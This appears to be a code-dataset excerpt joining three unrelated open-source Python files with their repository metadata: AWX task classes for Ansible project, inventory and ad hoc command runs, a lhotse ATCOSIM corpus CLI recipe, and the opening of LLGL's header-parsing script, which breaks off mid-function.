d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
project_path = instance.project.get_project_path(check_if_exists=False)
if instance.launch_type != 'sync':
self.acquire_lock(instance.project, instance.id)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
def build_project_dir(self, instance, private_data_dir):
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('../../', 'playbooks')
shutil.copytree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(project, job_private_data_dir):
"""Copy project content (roles and collections) to a job private_data_dir
:param object project: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
"""
project_path = project.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
shutil.copytree(project_path, destination_folder, ignore=shutil.ignore_patterns('.git'), symlinks=True)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(project.get_cache_path(), project.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
shutil.copytree(cache_subpath, dest_subpath, symlinks=True)
logger.debug('{0} {1} prepared {2} from cache'.format(type(project).__name__, project.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.runner_callback.playbook_new_revision:
instance.scm_revision = self.runner_callback.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
self.make_local_copy(instance, self.job_private_data_dir)
finally:
if instance.launch_type != 'sync':
self.release_lock(instance.project)
p = instance.project
if instance.job_type == 'check' and status not in ('failed', 'canceled'):
if self.runner_callback.playbook_new_revision:
p.scm_revision = self.runner_callback.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:z",
f"{cache_path}:{cache_path}:z",
]
)
return params
@task(queue=get_task_queuename)
class RunInventoryUpdate(SourceControlMixin, BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
callback_class = RunnerCallbackForInventoryUpdate
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
return self.write_private_data_file(private_data_dir, 'args', ' '.join(args))
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# special case for constructed inventories, we pass source inventories from database
# these must come in order, and in order _before_ the constructed inventory itself
if inventory_update.inventory.kind == 'constructed':
inventory_update.log_lifecycle("start_job_fact_cache")
for input_inventory in inventory_update.inventory.input_inventories.all():
args.append('-i')
script_params = dict(hostvars=True, towervars=True)
source_inv_path = self.write_inventory_file(input_inventory, private_data_dir, f'hosts_{input_inventory.id}', script_params)
args.append(to_container_path(source_inv_path, private_data_dir))
# Include any facts from input inventories so they can be used in filters
start_fact_cache(
input_inventory.hosts.only(*HOST_FACTS_FIELDS),
os.path.join(private_data_dir, 'artifacts', str(inventory_update.id), 'fact_cache'),
inventory_id=input_inventory.id,
)
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
# Added this in order to allow older versions of ansible-inventory https://github.com/ansible/ansible/pull/79596
# limit should be usable in ansible-inventory 2.15+
if inventory_update.limit:
args.append('--limit')
args.append(inventory_update.limit)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def should_use_fact_cache(self):
return bool(self.instance.source == 'constructed')
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
self.write_private_data_file(private_data_dir, injector.filename, content, sub_dir='inventory', file_permissions=0o700)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def build_project_dir(self, inventory_update, private_data_dir):
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if inventory_update.source == 'scm':
if not source_project:
raise RuntimeError('Could not find project to run SCM inventory update from.')
self.sync_and_copy(source_project, private_data_dir, scm_branch=inventory_update.inventory_source.scm_branch)
else:
# If source is not SCM make an empty project directory, content is built inside inventory folder
super(RunInventoryUpdate, self).build_project_dir(inventory_update, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
inventory_update.refresh_from_db()
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', str(inventory_update.id), 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.runner_callback.event_handler,
signal_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.runner_callback.event_ct,
initial_line=self.runner_callback.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_task_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
callback_class = RunnerCallbackForAdHocCommand
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = dict()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
extra_vars.update(ad_hoc_command.awx_meta_vars())
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_task_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
callback_class = RunnerCallbackForSystemJob
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
return self.write_private_data_file(private_data_dir, 'args', ' '.join(args))
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
|
cb5bda65dc44ef8df694fe82f55afa214f1240c7
|
29eac50cc208d8aaebde699e8c851ed84b2de591
|
/lhotse/bin/modes/recipes/atcosim.py
|
fdd1ac1274ee218c3690f4cee0dd454636d27b50
|
[
"Apache-2.0"
] |
permissive
|
lhotse-speech/lhotse
|
fcbbfbfd2e2bf95f9587268d605faa1d68df7790
|
088f1802d5fa528f64ee32d1f79197e42fb8aae5
|
refs/heads/master
| 2023-09-01T12:58:57.383768
| 2023-08-29T14:22:45
| 2023-08-29T14:22:45
| 258,529,948
| 667
| 159
|
Apache-2.0
| 2023-09-14T18:48:31
| 2020-04-24T14:08:10
|
Python
|
UTF-8
|
Python
| false
| false
| 1,312
|
py
|
atcosim.py
|
import click
from lhotse.bin.modes import download, prepare
from lhotse.recipes.atcosim import download_atcosim, prepare_atcosim
from lhotse.utils import Pathlike
__all__ = ["atcosim"]
@download.command(context_settings=dict(show_default=True))
@click.argument("target_dir", type=click.Path())
def atcosim(target_dir: Pathlike):
"""ATCOSIM download."""
download_atcosim(target_dir)
@prepare.command(context_settings=dict(show_default=True))
@click.argument("corpus_dir", type=click.Path(exists=True, dir_okay=True))
@click.argument("output_dir", type=click.Path())
@click.option("--silence-sym", type=str, default="")
@click.option("--breath-sym", type=str, default="")
@click.option("--foreign-sym", type=str, default="<unk>")
@click.option("--partial-sym", type=str, default="<unk>")
@click.option("--unknown-sym", type=str, default="<unk>")
def atcosim(
corpus_dir: Pathlike,
output_dir: Pathlike,
silence_sym: str,
breath_sym: str,
foreign_sym: str,
partial_sym: str,
unknown_sym: str,
):
"""ATCOSIM data preparation."""
prepare_atcosim(
corpus_dir,
output_dir=output_dir,
silence_sym=silence_sym,
breath_sym=breath_sym,
foreign_sym=foreign_sym,
partial_sym=partial_sym,
unknown_sym=unknown_sym,
)
|
b09fcbcd5d6ede1b9b81528a256d4c815d562e3a
|
b969ef7c2e6dbc7ec223ee8a87054a9c2f736658
|
/scripts/ParseLLGLHeader.py
|
1ad210285c43312f4378af031e47075467b733f2
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
LukasBanana/LLGL
|
186241fadbd0a3a77f3e008ca385950cce40273c
|
3d3b4d708704a6b430f9240003a09faa45f8e8b8
|
refs/heads/master
| 2023-08-23T10:29:33.190198
| 2023-08-23T03:14:48
| 2023-08-23T03:35:03
| 62,965,106
| 1,848
| 171
|
BSD-3-Clause
| 2023-08-28T22:36:19
| 2016-07-09T19:10:46
|
C++
|
UTF-8
|
Python
| false
| false
| 46,313
|
py
|
ParseLLGLHeader.py
|
#
# ParseLLGLHeader.py
#
# Copyright (c) 2015 Lukas Hermanns. All rights reserved.
# Licensed under the terms of the BSD 3-Clause license (see LICENSE.txt).
#
import os
import sys
import re
from enum import Enum
def printHelp():
print("help:")
print(" parses LLGL headers and stores the meta data")
print("usage:")
print(" ParseLLGLHeader.py FILE+ [flags]")
print("flags:")
print(" -c99 ......... Translate header to C99")
print(" -csharp ...... Translate header to C#")
print(" -name=NAME ... Override name for consolidated headers")
print(" -fn .......... Also parse exported C function declarations")
def iterate(func, cont):
return list(map(func, cont))
def fatal(msg):
print(sys.argv[0] + ': ' + msg)
sys.exit(1)
class StdType(Enum):
UNDEFINED = 0
VOID = 1
BOOL = 2
CHAR = 3
INT8 = 4
INT16 = 5
INT32 = 6
INT64 = 7
UINT8 = 8
UINT16 = 9
UINT32 = 10
UINT64 = 11
LONG = 12
SIZE_T = 13
FLOAT = 14
ENUM = 15
FLAGS = 16
STRUCT = 17
CONST = 18 # static constexpr int
class ConditionalType:
name = ''
cond = None
include = None
def __init__(self, name, cond = None, include = None):
self.name = name
self.cond = cond
self.include = include
class LLGLMeta:
UTF8STRING = 'UTF8String'
STRING = 'string'
externals = [
ConditionalType('android_app', 'defined LLGL_OS_ANDROID', '<android_native_app_glue.h>')
]
builtins = {
'void': StdType.VOID,
'bool': StdType.BOOL,
'char': StdType.CHAR,
'int8_t': StdType.INT8,
'int16_t': StdType.INT16,
'short': StdType.INT16,
'int32_t': StdType.INT32,
'int': StdType.INT32,
'int64_t': StdType.INT64,
'uint8_t': StdType.UINT8,
'uint16_t': StdType.UINT16,
'uint32_t': StdType.UINT32,
'uint64_t': StdType.UINT64,
'long': StdType.LONG,
'size_t': StdType.SIZE_T,
'float': StdType.FLOAT,
'const': StdType.CONST
}
containers = [
'vector',
'ArrayView'
]
interfaces = [
'Buffer',
'BufferArray',
'Canvas',
'CommandBuffer',
'CommandQueue',
'Display',
'Fence',
'Image',
'PipelineLayout',
'PipelineState',
'QueryHeap',
'RenderPass',
'RenderSystem',
'RenderTarget',
'RenderingDebugger',
'RenderingProfiler',
'Report',
'Resource',
'ResourceHeap',
'Sampler',
'Shader',
'Surface',
'SwapChain',
'Texture',
'Window'
]
includes = {
'<LLGL-C/Types.h>'
}
copyright = [
'Copyright (c) 2015 Lukas Hermanns. All rights reserved.',
'Licensed under the terms of the BSD 3-Clause license (see LICENSE.txt).'
]
info = [
'AUTO GENERATED CODE - DO NOT EDIT'
]
funcPrefix = 'llgl'
typePrefix = 'LLGL'
class LLGLMacros:
def translateArraySize(ident):
if ident == 'LLGL_MAX_NUM_COLOR_ATTACHMENTS':
return 8
else:
return int(ident)
class LLGLType:
baseType = StdType.UNDEFINED
typename = '' # E.g. "Format" or "BufferDescriptor"
arraySize = 0 # 0 for non-array, -1 for dynamic array, anything else for fixed size array
isConst = False
isPointer = False
externalCond = None # Conditional expression string for external typenames (see LLGLMeta.externals)
DYNAMIC_ARRAY = -1
def __init__(self, typename = '', isConst = False, isPointer = False):
self.baseType = LLGLType.toBaseType(typename)
self.typename = typename
self.arraySize = 0
self.isConst = isConst
self.isPointer = isPointer
self.externalCond = next((external.cond for external in LLGLMeta.externals if external.name == typename), None)
def setArraySize(self, arraySize):
if isinstance(arraySize, str):
self.arraySize = LLGLMacros.translateArraySize(arraySize)
else:
self.arraySize = arraySize
def __str__(self):
str = self.typename
if self.arraySize > 0:
str += '[{}]'.format(self.arraySize)
elif self.arraySize == -1:
str += '[]'
if self.isPointer:
str += '*'
if self.isConst:
str += '+'
return str
def toBaseType(typename):
if typename != '':
builtin = LLGLMeta.builtins.get(typename)
return builtin if builtin else StdType.STRUCT
return StdType.UNDEFINED
# Returns true if this type is a custom LLGL enum, flags, or struct declaration
def isCustomType(self):
return self.baseType == StdType.STRUCT and not self.typename in ([LLGLMeta.UTF8STRING, LLGLMeta.STRING] + LLGLMeta.containers)
# Returns true if this type is an LLGL interface type such as PipelineState
def isInterface(self):
return self.baseType == StdType.STRUCT and self.typename in LLGLMeta.interfaces
def isDynamicArray(self):
return self.arraySize == LLGLType.DYNAMIC_ARRAY
def isPointerOrString(self):
return self.isPointer or self.typename in [LLGLMeta.UTF8STRING, LLGLMeta.STRING]
def getFixedBitsize(self):
if self.baseType in [StdType.INT8, StdType.UINT8]:
return 8
elif type.baseType in [StdType.INT16, StdType.UINT16]:
return 16
elif type.baseType in [StdType.INT32, StdType.UINT32]:
return 32
elif type.baseType in [StdType.INT64, StdType.UINT64]:
return 64
return 0
class LLGLField:
name = ''
type = LLGLType()
init = None
def __init__(self, name, type = LLGLType()):
self.name = name
self.type = type
self.init = None
def __str__(self):
str = ''
if self.type.baseType != StdType.UNDEFINED:
str += f'{self.name}:{self.type}'
else:
str += f'{self.name}'
if self.init:
str += f'({self.init})'
return str
class LLGLRecord:
name = ''
base = None
fields = []
deps = set() # Set of record names this record depends on
def __init__(self, name):
self.name = name
self.base = None
self.fields = []
self.deps = set()
def hasConstFieldsOnly(self):
for field in self.fields:
if field.type.baseType != StdType.CONST:
return False
return True
# Returns set of struct names that this record depends on
def deriveDependencies(self):
for field in self.fields:
if field.type.isCustomType() and not field.type.isInterface() and field.type.typename != self.name:
self.deps.add(field.type.typename)
class LLGLFunction:
returnType = LLGLType()
name = ''
params = [] # Array of LLGLField
def __init__(self, name, returnType = LLGLType()):
self.returnType = returnType
self.name = name
self.params = []
class LLGLModule:
name = ''
enums = [] # Array of LLGLRecord
flags = [] # Array of LLGLRecord
structs = [] # Array of LLGLRecord
funcs = [] # Array of LLGLFunction
typeDeps = set() # Set of types used in this header
def __init__(self):
self.name = ''
self.enums = []
self.flags = []
self.structs = []
self.funcs = []
self.typeDeps = set()
def deriveDependencies(self):
for struct in self.structs:
for field in struct.fields:
self.typeDeps.add(field.type)
def merge(self, other):
self.enums.extend(other.enums)
self.flags.extend(other.flags)
self.structs.extend(other.structs)
self.funcs.extend(other.funcs)
self.typeDeps.update(other.typeDeps)
def findStructByName(self, name):
for struct in self.structs:
if struct.name == name:
return struct
return None
def sortStructsByDependencies(self):
# Derive dependencies for all structs
for struct in self.structs:
struct.deriveDependencies()
# Start with structs that have no dependencies
knownTypenames = set(external.name for external in LLGLMeta.externals)
baseTypenames = set(enum.name for enum in self.enums) | set(flag.name for flag in self.flags) | knownTypenames
sortedStructs = []
pendingStructs = []
for struct in self.structs:
if len(struct.deps) == 0:
sortedStructs.append(struct)
else:
pendingStructs.append(struct)
# Continue with remaining structs
while len(pendingStructs) > 0:
wasAnyPendingStructSorted = False
pendingStructIndex = 0
declaredTypenames = set(struct.name for struct in sortedStructs) | baseTypenames
while pendingStructIndex < len(pendingStructs):
struct = pendingStructs[pendingStructIndex]
if struct.deps.issubset(declaredTypenames):
sortedStructs.append(struct)
pendingStructs.pop(pendingStructIndex)
wasAnyPendingStructSorted = True
else:
pendingStructIndex += 1
if not wasAnyPendingStructSorted:
def printCyclicDependencies(struct, typenames):
print(f"Cyclic dependency in struct '{struct.name}':")
for dep in struct.deps:
if not dep in typenames:
print(f" ==> Missing '{dep}'")
printCyclicDependencies(pendingStructs[0], declaredTypenames)
fatal('error: failed to resolve dependencies')
return sortedStructs
def scanTokens(filename):
def preprocessSource(text):
def removeRange(text, start, end):
pos = 0
while True:
pos = text.find(start, pos)
if pos >= 0:
posEnd = text.find(end, pos + len(start))
if posEnd >= pos:
blanks = ' ' * (posEnd + len(end) - pos)
text = text[:pos] + blanks + text[posEnd if end == '\n' else posEnd + len(end):]
else:
pos += 1
else:
break
return text
# Remove comments and preprocessor directives
text = removeRange(text, '#', '\n')
text = removeRange(text, '//', '\n') #TMP
text = removeRange(text, '/*', '*/') #TMP
# Replace multi-line comments with single line comments
def convertComments(text, start, end, filler):
assert len(filler) == len(start)
assert len(filler) == len(end)
pos = 0
while True:
pos = text.find(start, pos)
if pos >= 0:
posEnd = text.find(end, pos + len(start))
if posEnd >= pos:
text = text[:pos] + filler + text[pos + len(start):]
while True:
lineEnd = text.find('\n', pos + len(start))
if lineEnd >= pos and lineEnd < posEnd:
text = text[:lineEnd] + filler + text[lineEnd:]
pos = lineEnd
else:
text = text[:posEnd] + filler + text[posEnd + len(end):]
pos = posEnd
break
else:
pos += 1
else:
break
return text
#text = convertComments(text, '/*', '*/', '//')
return text
# Scan tokens from source file
try:
with open(filename, 'r') as file:
